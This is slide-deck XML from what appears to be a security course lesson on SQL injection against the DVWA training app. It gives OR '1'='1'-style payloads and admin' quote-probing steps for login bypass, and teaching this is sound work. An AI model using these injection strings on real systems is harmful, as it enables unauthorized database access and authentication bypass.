              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>Note that there is no final quotation mark.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1">
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p8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77" name="Google Shape;1277;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348300" y="803825"/>
            <a:ext cx="8447400" cy="21936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D966"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>#Modify this payload:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFD966"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = ‘1’;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFD966"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>#So that it results with this query:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFD966"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = ` ` OR `1`=`1`;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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1" name="Shape 1281"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1282" name="Google Shape;1282;p8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OR Injection </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283" name="Google Shape;1283;p8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84" name="Google Shape;1284;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94942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highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the DVWA:SQL Injection web form to submit your portion of the payload. How many users are in the database?</a:t>
            </a:r>
            <a:endParaRPr b="1">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1285" name="Google Shape;1285;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25443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Submit your payload directly through the URL. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>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9" name="Shape 1289"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1290" name="Google Shape;1290;p8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OR Injection </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1291" name="Google Shape;1291;p8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92" name="Google Shape;1292;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="94942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b="1" lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Use the DVWA:SQL Injection web form to submit your portion of the payload. How many users are in the database?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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1293" name="Google Shape;1293;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1851575"/>
            <a:ext cx="9144000" cy="9015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sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>There are five users. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1294" name="Google Shape;1294;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25443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Submit your payload directly through the URL. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>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8" name="Shape 1298"/>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2" name="Shape 1302"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303" name="Google Shape;1303;p8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04" name="Google Shape;1304;p89"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login Bypasses</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C23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8" name="Shape 1308"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1309" name="Google Shape;1309;p90"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1310" name="Google Shape;1310;p9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11" name="Google Shape;1311;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="851375"/>
            <a:ext cx="8595300" cy="29556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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Login Bypasses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>In this activity, you will continue to use DVWA. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600"/>
            </a:br>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t>In the first half of the exercise, you will try to brute force an admin login to figure out what kind of quote the SQL statements could have used. Then, you will create a SQL statement using </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"/>
              <a:t> to test multiple conditions and modify the statement with your own payload.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>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5" name="Shape 1315"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1316" name="Google Shape;1316;p9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17" name="Google Shape;1317;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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90000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Login Bypass</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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1" name="Shape 1051"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p56"/>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1053" name="Google Shape;1053;p5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54" name="Google Shape;1054;p56"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: SQL Warm-Up</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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will use DB Fiddle to review SELECT WHERE statements.</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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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1" name="Shape 1321"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1322" name="Google Shape;1322;p9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Login Bypassess Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323" name="Google Shape;1323;p9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Try logging as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What type of quote do you think the SQL statement user?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1324" name="Google Shape;1324;p9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25" name="Google Shape;1325;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2202050"/>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Add an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> statement to your injection. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>If the server uses double quotes, your query should now look like: admin" or &lt;Condition&gt;, where &lt;Condition&gt; is your always-true condition, such as '2'='2'.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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9" name="Shape 1329"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1330" name="Google Shape;1330;p9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Login Bypassess Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p9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Try logging as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What type of quote do you think the SQL statement user?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1332" name="Google Shape;1332;p9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33" name="Google Shape;1333;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1561373"/>
            <a:ext cx="9144000" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>The error output suggests that the server is using a single quote.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1334" name="Google Shape;1334;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2202050"/>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Add an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> statement to your injection. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>If the server uses double quotes, your query should now look like: admin" or &lt;Condition&gt;, where &lt;Condition&gt; is your always-true condition, such as '2'='2'.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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8" name="Shape 1338"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p9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Login Bypassess Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1340" name="Google Shape;1340;p9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Try logging as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>admin’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What type of quote do you think the SQL statement user?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1341" name="Google Shape;1341;p9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42" name="Google Shape;1342;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1561373"/>
            <a:ext cx="9144000" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
